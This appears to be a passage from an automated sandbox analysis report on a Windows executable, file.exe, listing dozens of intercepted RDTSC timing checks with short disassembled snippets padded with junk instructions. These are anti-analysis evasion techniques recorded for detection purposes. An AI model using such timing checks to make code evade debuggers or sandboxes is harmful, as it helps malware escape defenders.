    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0BAD second address: 7B0BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0D2E second address: 7B0D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0D32 second address: 7B0D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8E4CB125D6h 0x0000000c jmp 00007F8E4CB125D0h 0x00000011 je 00007F8E4CB125EFh 0x00000017 jmp 00007F8E4CB125D9h 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0FF2 second address: 7B0FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0FF8 second address: 7B1008 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8E4CB125CBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B78E1 second address: 7B78E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C04 second address: 7B7C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9F71 second address: 7B9F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9F75 second address: 7B9F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9F79 second address: 7B9F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF055 second address: 7BF061 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E4CB125CEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF061 second address: 7BF068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF1B2 second address: 7BF1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8E4CB125C6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF1BC second address: 7BF1DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F8E4CE84BF6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF1DF second address: 7BF1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF322 second address: 7BF326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF46F second address: 7BF478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF478 second address: 7BF495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E4CE84C06h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF5EE second address: 7BF60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F8E4CB125D0h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F8E4CB125C6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF60F second address: 7BF63D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8E4CE84BF6h 0x00000008 jmp 00007F8E4CE84C00h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8E4CE84BFEh 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF63D second address: 7BF641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF7BB second address: 7BF7BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF7BF second address: 7BF7D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F8E4CB125D0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF7D9 second address: 7BF7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8E4CE84BF6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF7E3 second address: 7BF7E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF7E7 second address: 7BF805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnc 00007F8E4CE84C02h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C56F second address: 72C578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C578 second address: 72C57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C243D second address: 7C2481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E4CB125D7h 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8E4CB125D0h 0x00000012 jmp 00007F8E4CB125D5h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C260B second address: 7C260F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C28E6 second address: 7C28EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8648 second address: 7C864C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6CD7 second address: 7C6CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6CDB second address: 7C6D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8E4CE84BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F8E4CE84C09h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8E4CE84C04h 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6D1D second address: 7C6D4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D7h 0x00000007 jmp 00007F8E4CB125D0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6D4C second address: 7C6D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6D50 second address: 7C6D5A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8E4CB125C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6D5A second address: 7C6D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E4CE84BFBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6D6B second address: 7C6D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C70BD second address: 7C70D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F8E4CE84BFCh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C73EC second address: 7C73FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push ebx 0x0000000a jng 00007F8E4CB125C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C73FE second address: 7C7431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jc 00007F8E4CE84BF6h 0x0000000c jp 00007F8E4CE84BF6h 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jbe 00007F8E4CE84C0Bh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7575 second address: 7C7579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7579 second address: 7C75A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E4CE84C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F8E4CE84BF6h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C75A1 second address: 7C75A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C75A5 second address: 7C75AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C75AB second address: 7C75B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C75B5 second address: 7C75D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8E4CE84BF6h 0x0000000a jmp 00007F8E4CE84C01h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773B74 second address: 773B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773B84 second address: 773B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C787D second address: 7C78A3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8E4CB125C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8E4CB125D1h 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop eax 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF6A7 second address: 7CF6BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8E4CE84BFDh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD871 second address: 7CD877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD877 second address: 7CD893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E4CE84BFDh 0x00000009 popad 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edi 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD893 second address: 7CD89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8E4CB125C6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD89D second address: 7CD8A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDB72 second address: 7CDB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E4CB125CEh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDB84 second address: 7CDB9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE132 second address: 7CE137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEB3F second address: 7CEB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CF0CF second address: 7CF0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 jnp 00007F8E4CB125CEh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728F9F second address: 728FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D801E second address: 7D8023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8023 second address: 7D8029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1691 second address: 7E1695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1695 second address: 7E169B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFC6B second address: 7DFC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFC79 second address: 7DFC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8E4CE84BF6h 0x0000000a pop eax 0x0000000b jns 00007F8E4CE84BFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFC98 second address: 7DFC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFE47 second address: 7DFE4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1545 second address: 7E1549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1549 second address: 7E1564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8E4CE84C03h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6E4A second address: 7E6E5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6FB8 second address: 7E6FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7107 second address: 7E7127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007F8E4CB125CAh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F8E4CB125CDh 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7127 second address: 7E716B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8E4CE84C03h 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ebx 0x00000013 jo 00007F8E4CE84C0Bh 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F8E4CE84C03h 0x00000020 push eax 0x00000021 push edx 0x00000022 jns 00007F8E4CE84BF6h 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E716B second address: 7E716F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7685 second address: 7F7689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7689 second address: 7F7693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7693 second address: 7F7699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7699 second address: 7F769D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8114CF second address: 8114D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8114D3 second address: 8114DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811650 second address: 81166C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C08h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81166C second address: 811675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8117F9 second address: 811806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F8E4CE84BFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811806 second address: 81180A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81180A second address: 811838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F8E4CE84BF6h 0x00000016 jmp 00007F8E4CE84BFCh 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811838 second address: 811854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81635F second address: 816388 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8E4CE84BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F8E4CE84BF6h 0x00000013 jmp 00007F8E4CE84C06h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825EF4 second address: 825EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8237E6 second address: 8237EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8237EF second address: 8237F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8237F3 second address: 82380E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8E4CE84BFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C695 second address: 84C699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C699 second address: 84C6B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E4CE84C01h 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F8E4CE84BF6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84C6B8 second address: 84C6C2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8E4CB125C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B6D0 second address: 84B6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B6D4 second address: 84B6E8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E4CB125C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F8E4CB125C6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BDC7 second address: 84BDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BDD0 second address: 84BDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BDD4 second address: 84BDD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
